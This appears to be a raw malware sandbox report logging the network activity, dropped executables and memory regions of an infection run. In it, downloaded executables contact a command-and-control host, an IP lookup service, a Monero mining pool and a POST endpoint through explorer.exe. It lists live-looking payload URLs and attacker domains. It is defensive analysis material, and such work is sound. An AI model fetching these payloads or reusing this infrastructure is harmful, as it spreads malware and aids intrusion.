Response
HTTP/2.0 200
cache-control: public, max-age=2592000
content-length: 457945
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 01564E89FED941E391BC92767EF2E755 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
date: Mon, 18 Mar 2024 18:12:21 GMT
• US
GET
https://tse1.mm.bing.net/th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4
Remote address: 204.79.197.200:443
Request
GET /th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response
HTTP/2.0 200
cache-control: public, max-age=2592000
content-length: 509846
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 164DA36D2A6C48ECBC6627CA596DAF82 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
date: Mon, 18 Mar 2024 18:12:21 GMT
• US
DNS
123.10.44.20.in-addr.arpa
Remote address: 8.8.8.8:53
Request
123.10.44.20.in-addr.arpa IN PTR
Response
• DE
POST
http://cf-protected-l7.com/api/endpoint.php
explorer.exe
Remote address: 134.255.231.136:80
Request
POST /api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 524
Content-Type: application/json
Host: cf-protected-l7.com
User-Agent: cpp-httplib/0.12.6
Response
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2024 02:13:11 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Robots-Tag: noindex, nofollow
X-Powered-By: PHP/8.0.30
Content-Length: 479
Connection: close
Content-Type: text/html; charset=UTF-8
• US
DNS
83.23.94.141.in-addr.arpa
Remote address: 8.8.8.8:53
Request
83.23.94.141.in-addr.arpa IN PTR
Response
83.23.94.141.in-addr.arpa IN PTR vps-e1036e6dvpsovhnet
• 94.156.66.151:80
http://94.156.66.151/
http
chrome.exe
704 B
2.3kB
6
5
HTTP Request: GET http://94.156.66.151/
HTTP Response: 200
• 94.156.66.151:80
http://94.156.66.151/icons/blank.gif
http
chrome.exe
650 B
628 B
6
4
HTTP Request: GET http://94.156.66.151/icons/blank.gif
HTTP Response: 200
• 94.156.66.151:80
http://94.156.66.151/gfgghdhwhatsup.exe
http
chrome.exe
                                                                                                                          109.0kB
                                                                                                                          5.4MB
                                                                                                                          2242
                                                                                                                          3882

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/icons/unknown.gif

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/favicon.ico

                                                                                                                          HTTP Response

                                                                                                                          404

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/gfgghdhwhatsup.exe

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 94.156.66.151:80
                                                                                                                          http://94.156.66.151/icons/binary.gif
                                                                                                                          http
                                                                                                                          chrome.exe
                                                                                                                          651 B
                                                                                                                          726 B
                                                                                                                          6
                                                                                                                          4

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/icons/binary.gif

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 20.231.121.79:80
                                                                                                                          46 B
                                                                                                                          1
                                                                                                                        • 94.156.66.151:80
                                                                                                                          chrome.exe
                                                                                                                          386 B
                                                                                                                          184 B
                                                                                                                          8
                                                                                                                          4
                                                                                                                        • 94.156.66.151:80
                                                                                                                          http://94.156.66.151/hghghjhfhleviticus.exe
                                                                                                                          http
                                                                                                                          chrome.exe
                                                                                                                          24.9kB
                                                                                                                          1.3MB
                                                                                                                          510
                                                                                                                          915

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/ghfhhminfudk.exe

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://94.156.66.151/hghghjhfhleviticus.exe

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 204.79.197.200:443
                                                                                                                          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
                                                                                                                          tls, http2
                                                                                                                          2.0kB
                                                                                                                          9.7kB
                                                                                                                          22
                                                                                                                          18

                                                                                                                          HTTP Request

                                                                                                                          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

                                                                                                                          HTTP Response

                                                                                                                          204

                                                                                                                          HTTP Request

                                                                                                                          GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

                                                                                                                          HTTP Response

                                                                                                                          204

                                                                                                                          HTTP Request

                                                                                                                          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

                                                                                                                          HTTP Response

                                                                                                                          204
                                                                                                                        • 94.156.66.151:39001
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          vbc.exe
                                                                                                                          534 B
                                                                                                                          432 B
                                                                                                                          9
                                                                                                                          7
                                                                                                                        • 49.13.193.134:443
                                                                                                                          https://api.filedoge.com/download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7
                                                                                                                          tls, http
                                                                                                                          vbc.exe
                                                                                                                          77.0kB
                                                                                                                          3.4MB
                                                                                                                          1501
                                                                                                                          2421

                                                                                                                          HTTP Request

                                                                                                                          GET https://api.filedoge.com/download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 94.156.66.151:3634
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          tls
                                                                                                                          dfsdff.exe
                                                                                                                          2.1kB
                                                                                                                          3.0kB
                                                                                                                          22
                                                                                                                          19
                                                                                                                        • 195.201.57.90:443
                                                                                                                          https://ipwho.is/
                                                                                                                          tls, http
                                                                                                                          dfsdff.exe
                                                                                                                          1.3kB
                                                                                                                          5.8kB
                                                                                                                          12
                                                                                                                          10

                                                                                                                          HTTP Request

                                                                                                                          GET https://ipwho.is/

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 134.255.231.136:80
                                                                                                                          cf-protected-l7.com
                                                                                                                          explorer.exe
                                                                                                                          98 B
                                                                                                                          80 B
                                                                                                                          2
                                                                                                                          2
                                                                                                                        • 51.89.23.91:10300
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          explorer.exe
                                                                                                                          1.1kB
                                                                                                                          2.8kB
                                                                                                                          11
                                                                                                                          10
                                                                                                                        • 172.217.168.234:443
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          tls
                                                                                                                          2.0kB
                                                                                                                          8.0kB
                                                                                                                          18
                                                                                                                          19
                                                                                                                        • 134.255.231.136:80
                                                                                                                          http://cf-protected-l7.com/api/endpoint.php
                                                                                                                          http
                                                                                                                          explorer.exe
                                                                                                                          1.0kB
                                                                                                                          479 B
                                                                                                                          7
                                                                                                                          5

                                                                                                                          HTTP Request

                                                                                                                          POST http://cf-protected-l7.com/api/endpoint.php

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 204.79.197.200:443
                                                                                                                          tse1.mm.bing.net
                                                                                                                          tls, http2
                                                                                                                          1.3kB
                                                                                                                          8.1kB
                                                                                                                          17
                                                                                                                          14
                                                                                                                        • 204.79.197.200:443
                                                                                                                          tse1.mm.bing.net
                                                                                                                          tls, http2
                                                                                                                          1.3kB
                                                                                                                          8.2kB
                                                                                                                          17
                                                                                                                          15
                                                                                                                        • 204.79.197.200:443
                                                                                                                          https://tse1.mm.bing.net/th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4
                                                                                                                          tls, http2
                                                                                                                          78.7kB
                                                                                                                          2.2MB
                                                                                                                          1598
                                                                                                                          1591

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239360607761_1X7SCS2IJANBBPHGW&pid=21.2&w=1920&h=1080&c=4

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4

                                                                                                                          HTTP Request

                                                                                                                          GET https://tse1.mm.bing.net/th?id=OADD2.10239360607763_1FO0BOSDEQ7YV4Y6R&pid=21.2&w=1080&h=1920&c=4

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 204.79.197.200:443
                                                                                                                          tse1.mm.bing.net
                                                                                                                          tls, http2
                                                                                                                          1.2kB
                                                                                                                          8.1kB
                                                                                                                          16
                                                                                                                          14
                                                                                                                        • 134.255.231.136:80
                                                                                                                          http://cf-protected-l7.com/api/endpoint.php
                                                                                                                          http
                                                                                                                          explorer.exe
                                                                                                                          973 B
                                                                                                                          942 B
                                                                                                                          6
                                                                                                                          5

                                                                                                                          HTTP Request

                                                                                                                          POST http://cf-protected-l7.com/api/endpoint.php

                                                                                                                          HTTP Response

                                                                                                                          200
| Destination | Domain | Proto | Process | Bytes sent | Bytes received | Packets sent | Packets received | DNS request | DNS response |
|---|---|---|---|---|---|---|---|---|---|
| 141.94.23.83:10300 | xmr-eu1.nanopool.org | | explorer.exe | 774 B | 509 B | 4 | 3 | | |
| 94.156.66.151:39001 | gjhfhgdg.insane.wang | | vbc.exe | 488 B | 328 B | 8 | 7 | | |
| 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | dns | | 71 B | 157 B | 1 | 1 | 76.32.126.40.in-addr.arpa | |
| 8.8.8.8:53 | 65.179.17.96.in-addr.arpa | dns | | 71 B | 135 B | 1 | 1 | 65.179.17.96.in-addr.arpa | |
| 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | dns | | 73 B | 144 B | 1 | 1 | 95.221.229.192.in-addr.arpa | |
| 8.8.8.8:53 | 151.66.156.94.in-addr.arpa | dns | | 72 B | 132 B | 1 | 1 | 151.66.156.94.in-addr.arpa | |
| 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | dns | | 72 B | 158 B | 1 | 1 | 241.154.82.20.in-addr.arpa | |
| 224.0.0.251:5353 | | | chrome.exe | 204 B | | 3 | | | |
| 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | dns | | 71 B | 135 B | 1 | 1 | 41.110.16.96.in-addr.arpa | |
| 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | dns | | 72 B | 158 B | 1 | 1 | 241.150.49.20.in-addr.arpa | |
| 8.8.8.8:53 | g.bing.com | dns | | 56 B | 158 B | 1 | 1 | g.bing.com | 204.79.197.200, 13.107.21.200 |
| 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | dns | | 73 B | 106 B | 1 | 1 | 200.197.79.204.in-addr.arpa | |
| 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | dns | | 72 B | 158 B | 1 | 1 | 232.168.11.51.in-addr.arpa | |
| 8.8.8.8:53 | gjhfhgdg.insane.wang | dns | vbc.exe | 66 B | 82 B | 1 | 1 | gjhfhgdg.insane.wang | 94.156.66.151 |
| 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | dns | | 72 B | 146 B | 1 | 1 | 157.123.68.40.in-addr.arpa | |
| 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | dns | | 72 B | 158 B | 1 | 1 | 28.118.140.52.in-addr.arpa | |
| 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | dns | | 72 B | 158 B | 1 | 1 | 171.39.242.20.in-addr.arpa | |
| 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | dns | | 72 B | 137 B | 1 | 1 | 18.134.221.88.in-addr.arpa | |
| 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | dns | | 73 B | 159 B | 1 | 1 | 183.142.211.20.in-addr.arpa | |
| 8.8.8.8:53 | api.filedoge.com | dns | vbc.exe | 62 B | 78 B | 1 | 1 | api.filedoge.com | 49.13.193.134 |
| 8.8.8.8:53 | 134.193.13.49.in-addr.arpa | dns | | 72 B | 129 B | 1 | 1 | 134.193.13.49.in-addr.arpa | |
| 8.8.8.8:53 | ipwho.is | dns | dfsdff.exe | 54 B | 70 B | 1 | 1 | ipwho.is | 195.201.57.90 |
| 8.8.8.8:53 | 75.179.17.96.in-addr.arpa | dns | | 142 B | 135 B | 2 | 1 | 75.179.17.96.in-addr.arpa, 75.179.17.96.in-addr.arpa | |
| 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | dns | | 72 B | 129 B | 1 | 1 | 90.57.201.195.in-addr.arpa | |
| 8.8.8.8:53 | xmr-eu1.nanopool.org | dns | explorer.exe | 132 B | 242 B | 2 | 1 | xmr-eu1.nanopool.org, xmr-eu1.nanopool.org | 162.19.224.121, 51.15.58.224, 54.37.137.114, 51.15.65.182, 51.89.23.91, 146.59.154.106, 163.172.154.142, 54.37.232.103, 141.94.23.83, 51.15.193.130, 212.47.253.124 |
| 8.8.8.8:53 | cf-protected-l7.com | dns | explorer.exe | 65 B | 81 B | 1 | 1 | cf-protected-l7.com | 134.255.231.136 |
| 8.8.8.8:53 | 136.231.255.134.in-addr.arpa | dns | | 74 B | 120 B | 1 | 1 | 136.231.255.134.in-addr.arpa | |
                                                                                                                        • 8.8.8.8:53
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          dns
                                                                                                                          140 B
                                                                                                                          108 B
                                                                                                                          2
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          91.23.89.51.in-addr.arpa

                                                                                                                          DNS Request

                                                                                                                          91.23.89.51.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          53.179.17.96.in-addr.arpa
                                                                                                                          dns
                                                                                                                          71 B
                                                                                                                          135 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          53.179.17.96.in-addr.arpa

                                                                                                                        • 8.8.8.8:53
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          dns
                                                                                                                          75 B
                                                                                                                          235 B
                                                                                                                          1
                                                                                                                          1

                                                                                                                          DNS Request

                                                                                                                          chromewebstore.googleapis.com

• 8.8.8.8:53  chromewebstore.googleapis.com  dns  sent 75 B, received 132 B, 1 request, 1 response
    DNS Request: chromewebstore.googleapis.com

• 8.8.8.8:53  234.168.217.172.in-addr.arpa  dns  sent 74 B, received 113 B, 1 request, 1 response
    DNS Request: 234.168.217.172.in-addr.arpa

• 8.8.8.8:53  23.236.111.52.in-addr.arpa  dns  sent 72 B, received 158 B, 1 request, 1 response
    DNS Request: 23.236.111.52.in-addr.arpa

• 8.8.8.8:53  88.156.103.20.in-addr.arpa  dns  sent 72 B, received 158 B, 1 request, 1 response
    DNS Request: 88.156.103.20.in-addr.arpa

• 8.8.8.8:53  26.35.223.20.in-addr.arpa  dns  sent 71 B, received 157 B, 1 request, 1 response
    DNS Request: 26.35.223.20.in-addr.arpa

• 8.8.8.8:53  tse1.mm.bing.net  dns  sent 62 B, received 173 B, 1 request, 1 response
    DNS Request: tse1.mm.bing.net
    DNS Response: 204.79.197.200, 13.107.21.200

• 8.8.8.8:53  123.10.44.20.in-addr.arpa  dns  sent 71 B, received 145 B, 1 request, 1 response
    DNS Request: 123.10.44.20.in-addr.arpa

• 8.8.8.8:53  83.23.94.141.in-addr.arpa  dns  sent 71 B, received 109 B, 1 request, 1 response
    DNS Request: 83.23.94.141.in-addr.arpa

                                                                                                                        MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences (5KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences (6KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences (5KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences (5KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences (5KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State (128KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State (128KB)
• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json (2B)
• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fgfdgd.exe.log (660B)

• C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
  Filesize: 956KB

• C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
  Filesize: 1.1MB

• C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
  Filesize: 691KB

• C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
  Filesize: 4.3MB

• C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
  Filesize: 5.0MB

• C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
  Filesize: 4.2MB

• C:\Users\Admin\AppData\Local\Temp\haaczrnyavrj.sys
  Filesize: 14KB

• C:\Users\Admin\AppData\Local\Temp\ijvcoeh.exe
  Filesize: 3.1MB

• C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
  Filesize: 4.7MB

• C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
  Filesize: 4.3MB

• C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
  Filesize: 342KB

• C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
  Filesize: 960KB

• C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe
  Filesize: 2.0MB

• C:\Users\Admin\Downloads\Unconfirmed 339238.crdownload
  Filesize: 539KB

• C:\Users\Admin\Downloads\Unconfirmed 653412.crdownload
  Filesize: 640KB

• C:\Users\Admin\Downloads\Unconfirmed 900198.crdownload
  Filesize: 5.0MB

• C:\Users\Admin\Downloads\gfgghdhwhatsup.exe
  Filesize: 4.1MB

• C:\Users\Admin\Downloads\gfgghdhwhatsup.exe
  Filesize: 3.5MB

• C:\Users\Admin\Downloads\ghfhhminfudk.exe
  Filesize: 665KB

                                                                                                                        • memory/1184-326-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/1184-327-0x00000000017A0000-0x00000000017B0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/1184-329-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/1352-291-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/1352-292-0x000000001B5D0000-0x000000001B5E0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/1352-301-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/3880-152-0x000001B06E050000-0x000001B06E450000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.0MB

                                                                                                                        • memory/3880-158-0x00007FF998390000-0x00007FF998659000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.8MB

                                                                                                                        • memory/3880-163-0x000001B06E050000-0x000001B06E450000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.0MB

                                                                                                                        • memory/3880-155-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/3880-153-0x000001B06E050000-0x000001B06E450000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.0MB

                                                                                                                        • memory/3880-149-0x000001B06C440000-0x000001B06C449000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          36KB

                                                                                                                        • memory/3880-156-0x00007FF999B20000-0x00007FF999BDE000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          760KB

                                                                                                                        • memory/3880-157-0x000001B06E050000-0x000001B06E450000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.0MB

                                                                                                                        • memory/3904-333-0x0000000001CA0000-0x0000000001CB0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/3904-332-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/4116-314-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/4116-324-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/4116-315-0x000000001B440000-0x000000001B450000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/4700-274-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/4700-242-0x000000001C300000-0x000000001C350000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          320KB

                                                                                                                        • memory/4700-243-0x000000001C410000-0x000000001C4C2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          712KB

                                                                                                                        • memory/4700-257-0x000000001C380000-0x000000001C392000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/4700-259-0x000000001CF10000-0x000000001CF4C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          240KB

                                                                                                                        • memory/4700-227-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5128-252-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5128-232-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5444-219-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-208-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-215-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-216-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-218-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-217-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-209-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-220-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-214-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5444-210-0x0000022F430B0000-0x0000022F430B1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/5448-245-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-250-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-263-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-260-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-176-0x0000000000180000-0x0000000000680000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.0MB

                                                                                                                        • memory/5448-198-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5448-258-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-262-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-246-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-261-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-249-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-251-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-178-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5448-253-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-254-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8.3MB

                                                                                                                        • memory/5448-255-0x0000000000B20000-0x0000000000B40000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          128KB

                                                                                                                        • memory/5556-228-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5556-207-0x000000001B460000-0x000000001B470000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5556-206-0x0000000000470000-0x0000000000794000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.1MB

                                                                                                                        • memory/5556-205-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5560-105-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5560-106-0x000000001B060000-0x000000001B070000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5560-104-0x0000000000210000-0x00000000002BA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          680KB

                                                                                                                        • memory/5560-111-0x00007FF977220000-0x00007FF977CE1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/5632-154-0x000001BC7AED0000-0x000001BC7AEE0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5632-164-0x000001BC7AED0000-0x000001BC7AEE0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/5632-231-0x000001BC7AED0000-0x000001BC7AEE0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB
